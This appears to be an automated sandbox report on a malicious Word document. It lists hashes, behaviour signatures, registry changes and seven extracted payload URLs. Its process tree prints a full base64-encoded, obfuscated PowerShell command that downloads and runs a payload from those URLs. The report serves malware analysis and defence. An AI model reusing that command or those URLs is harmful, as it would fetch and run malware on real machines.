Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
20-09-2024 15:54
Behavioral task
behavioral1
Sample
edeec58569ed98cdfdd13cbc526c7d0e_JaffaCakes118.doc
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
edeec58569ed98cdfdd13cbc526c7d0e_JaffaCakes118.doc
Resource
win10v2004-20240802-en
General
-
Target
edeec58569ed98cdfdd13cbc526c7d0e_JaffaCakes118.doc
-
Size
159KB
-
MD5
edeec58569ed98cdfdd13cbc526c7d0e
-
SHA1
6749591687c43582c870e405762ada3ed7530007
-
SHA256
6ce61eccd50917328baca8baa337e8be84724ca3af434db260146552b5b901b7
-
SHA512
b536ca31c925f66cdbfcbf99c0dc5434207302f24fde783764296afc3ef1809b7b460e239307cc710c08057dbd2a1058232add88e63747da59d2a889794513ae
-
SSDEEP
1536:kcLzncLzMrdi1Ir77zOH98Wj2gpngx+a9YLln2/5Iq:9rfrzOH98ipg8L05Iq
Malware Config
Extracted
http://wynn838.com/wp-content/enE/
https://sertres.com/ivmej/p/
https://viaje-achina.com/wp-admin/aG/
https://aszcasino.com/aszdemo/AGA/
https://bintangremaja.com/wp-content/U/
https://phongkhamthaiduongbienhoa.vn/wp-admin/Z/
http://hk.olivellaline.com/gbi1e/2/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2720 2828 powershell.exe 30 -
Blocklisted process makes network request 7 IoCs
flow pid Process 6 2720 powershell.exe 9 2720 powershell.exe 10 2720 powershell.exe 14 2720 powershell.exe 15 2720 powershell.exe 17 2720 powershell.exe 18 2720 powershell.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\TypeLib\{B740D9F7-0F26-4A49-8143-E9E1F3CE690F}\2.0\HELPDIR WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}\ = "ICommandButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{B740D9F7-0F26-4A49-8143-E9E1F3CE690F}\2.0\FLAGS\ = "6" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{B740D9F7-0F26-4A49-8143-E9E1F3CE690F} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\TypeLib\{B740D9F7-0F26-4A49-8143-E9E1F3CE690F}\2.0\0\win32 WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\TypeLib\{B740D9F7-0F26-4A49-8143-E9E1F3CE690F}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2396 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2720 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2720 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2396 WINWORD.EXE 2396 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2396 wrote to memory of 2296 2396 WINWORD.EXE 34 PID 2396 wrote to memory of 2296 2396 WINWORD.EXE 34 PID 2396 wrote to memory of 2296 2396 WINWORD.EXE 34 PID 2396 wrote to memory of 2296 2396 WINWORD.EXE 34
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\edeec58569ed98cdfdd13cbc526c7d0e_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2396 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2296
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e JABGAHoAcABuAGIAMwBrAD0AKAAnAEYAJwArACgAJwA2AG8AJwArACcAcQBvAGUAJwApACsAJwAzACcAKQA7AC4AKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAbQAnACkAIAAkAGUATgB2ADoAVQBTAEUAcgBQAFIAbwBGAEkATABFAFwAVABwAHoANABTAFEAMQBcAFgAQwBJAGIAMwBnAHQAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAFIARQBDAFQAbwByAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAYABlAEMAdQBgAFIAaQBUAHkAUABSAGAATwB0AE8AYwBgAG8AbAAiACAAPQAgACgAKAAnAHQAJwArACcAbABzADEAJwApACsAKAAnADIALAAnACsAJwAgAHQAbABzADEAJwApACsAKAAnADEALAAgACcAKwAnAHQAbAAnACkAKwAnAHMAJwApADsAJABUAG0AZwB6AHkAZgBfACAAPQAgACgAJwBNACcAKwAoACcAbwB0ADYAJwArACcAMABuAGUAcgAnACsAJwBhACcAKQApADsAJABJAGwAMQBfAHAAdQA0AD0AKAAoACcATQAwADIAJwArACcAdwAyACcAKQArACcAXwAnACsAJwBlACcAKQA7ACQAWAAxAGIAaABuADkAYgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAKAAnADYAJwArACcAbwBuAFQAJwApACsAKAAnAHAAegAnACsAJwA0ACcAKQArACcAcwAnACsAKAAnAHEAJwArACcAMQA2AG8AJwArACcAbgBYAGMAaQBiACcAKQArACcAMwBnACcAKwAnAHQAJwArACcANgAnACsAJwBvAG4AJwApAC4AIgByAGUAUABgAEwAQQBDAGUAIgAoACgAJwA2AG8AJwArACcAbgAnACkALABbAFMAVAByAGkAbgBHAF0AWwBDAEgAYQBSAF0AOQAyACkAKQArACQAVABtAGcAegB5AGYAXwArACgAKAAnAC4AJwArACcAZQB4ACcAKQArACcAZQAnACkAOwAkAFAAeABiAGoAdgAzAGsAPQAoACgAJwBQACcAKwAnAG8AeAAnACkAKwAnAHoANwAnACsAJwA2AHUAJwApADsAJABNAG4AbQBtAGMAYwAwAD0AJgAoACcAbgBlACcAKwAnAHcALQBvAGIAagBlACcAKwAnAGMAJwArACcAdAAnACkAIABuAGUAVAAuAFcAZQBCAEMATABpAGUATgB0ADsAJABSAGoAYwBlADQAdgA0AD0AKAAnAGgAJwArACcAdAAnACsAJwB0AHAAJwArACcAOgAvACcAKwAoACcALwB3ACcAKwAnAHkAJwApACsAKAAnAG4AbgAnACsAJwA4ACcAKQArACgAJwAzADgALgAnACsAJwBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACkAKwAoACcAbgB0ACcAKwAnAGUAJwArACcAbgB0AC8AJwApACsAKAAnAGUAbgAnACsAJwBFACcAKQArACcALwAnACsAKAAnACoAaAAnACsAJwB0ACcAKQArACgAJwB0AHAAcwAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AcwBlAHIAdAByACcAKwAnAGUAcwAnACkAKwAoACcALgBjACcAKwAnAG8AJwApACsAKAAnAG0ALwAnACsAJwBpAHYAJwArACcAbQBlAGoALwBwAC8AKgBoACcAKwAnAHQAdAAnACkAKwAoACcAcABzADoALwAvACcAKwAnAHYAJwArACcAaQAnACkAKwAoACcAYQBqAGUAJwArACcALQBhACcAKQArACcAYwBoACcAKwAoACcAaQAnACsAJwBuAGEAJwApACsAKAAnAC4AYwBvACcAKwAnAG0AJwApACsAKAAnAC8AdwBwAC0AYQBkAG0AaQBuAC8AYQBHAC8AKgAnACsAJwBoACcAKwAnAHQAdAAnACsAJwBwACcAKwAnAHMAJwArACcAOgAnACsAJwAvACcAKwAnAC8AYQBzAHoAJwApACsAJwBjAGEAJwArACcAcwAnACsAJwBpACcAKwAoACcAbgBvAC4AYwBvACcAKwAnAG0ALwAnACsAJwBhACcAKQArACcAcwB6ACcAKwAnAGQAJwArACgAJwBlACcAKwAnAG0AbwAvACcAKQArACgAJwBBAEcAQQAnACsAJwAvACoAaAB0AHQAcAAnACkAKwAoACcAcwA6ACcAKwAnAC8ALwBiACcAKQArACgAJwBpACcAKwAnAG4AdABhACcAKQArACcAbgBnACcAKwAoACcAcgBlAG0AYQBqACcAKwAnAGEALgBjACcAKQArACgAJwBvACcAKwAnAG0ALwB3ACcAKQArACgAJwBwAC0AYwBvAG4AJwArACcAdABlAG4AJwArACcAdAAnACkAKwAnAC8AJwArACgAJwBVAC8AJwArACcAKgBoACcAKQArACgAJwB0AHQAcABzADoAJwArACcALwAvACcAKQArACgAJwBwAGgAJwArACcAbwAnACkAKwAoACcAbgBnACcAKwAnAGsAJwApACsAJwBoACcAKwAoACcAYQBtACcAKwAnAHQAJwApACsAJwBoACcAKwAoACcAYQAnACsAJwBpAGQAdQBvACcAKwAnAG4AJwArACcAZwBiAGkAJwArACcAZQAnACsAJwBuACcAKwAnAGgAbwBhAC4AdgBuAC8AdwBwAC0AJwApACsAKAAnAGEAZAAnACsAJwBtAGkAbgAvACcAKwAnAFoALwAqAGgAJwApACsAKAAnAHQAdABwADoALwAvACcAKwAnAGgAawAuAG8AJwArACcAbAAnACsAJwBpACcAKQArACgAJwB2ACcAKwAnAGUAJwArACcAbABsAGEAbABpAG4AZQAuAGMAbwBtACcAKQArACgAJwAvACcAKwAnAGcAYgAnACkAKwAnAGkAJwArACcAMQAnACsAKAAnAGUALwAnACsAJwAyAC8AJwApACkALgAiAFMAcABgAGwAaQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQASgAwAHEAXwBiAGgAcQA9ACgAJwBRAGIAJwArACcAeAA1ACcAKwAoACcAZAAnACsAJwA2AHkAJwApACkAOwBmAG8AcgBlAGEAYwBoACgAJABBAHEAZwBsAGoAeABmACAAaQBuACAAJABSAGoAYwBlADQAdgA0ACkAewB0AHIAeQB7ACQATQBuAG0AbQBjAGMAMAAuACIAZABPAHcAbgBgAEwATwBgAEEARABGAGkAYABMAGUAIgAoACQAQQBxAGcAbABqAHgAZgAsACAAJABYADEAYgBoAG4AOQBiACkAOwAkAFMAYQAzAHMAcQAyAHMAPQAoACgAJwBBAGwAJwArACcAcAAnACkAKwAoACcAYgA5ACcAKwAnAGQAJwApACsAJwBxACcAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAnACsAJwAtACcAKwAnAEkAdABlAG0AJwApACAAJABYADEAYgBoAG4AOQBiACkALgAiAEwAYABlAG4AYABHAFQASAAiACAALQBnAGUAIAAzADIANwA0ADIAKQAgAHsAJgAoACcASQBuAHYAbwBrACcAKwAnAGUALQBJAHQAZQAnACsAJwBtACcAKQAoACQAWAAxAGIAaABuADkAYgApADsAJABWAGoANAB0AGUAOABuAD0AKAAnAEUAJwArACgAJwB3ACcAKwAnAHQAZgBxACcAKQArACcAbAAxACcAKQA7AGIAcgBlAGEAawA7ACQAQwAwADcAYwBjAHMAdwA9ACgAJwBZADAAJwArACcAMQAnACsAKAAnADQAbwAnACsAJwA4AHUAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFoAcABrAHcANwBhAHYAPQAoACcASwAnACsAKAAnAGsAJwArACcAagBmADAAbgB2ACcAKQApAA==1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2720
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD5315e3f1bf0a70185a5b33561a4167216
SHA1cc3bad6c147d565aa2b94a518cbfb26dab0cd6eb
SHA2566810bbc621bbb92d86982d5cba88cdf3fd142db24c5984d5cc14954aa9b8041e
SHA51231d9cb9bc9c4d6f40e5517c2bb3e3233f7f71ad0c397984f300149a09ee23d99202a0da2ac0c83e0f46de577873c964dfb37ebc5b0d440f1683ad5cb4212936c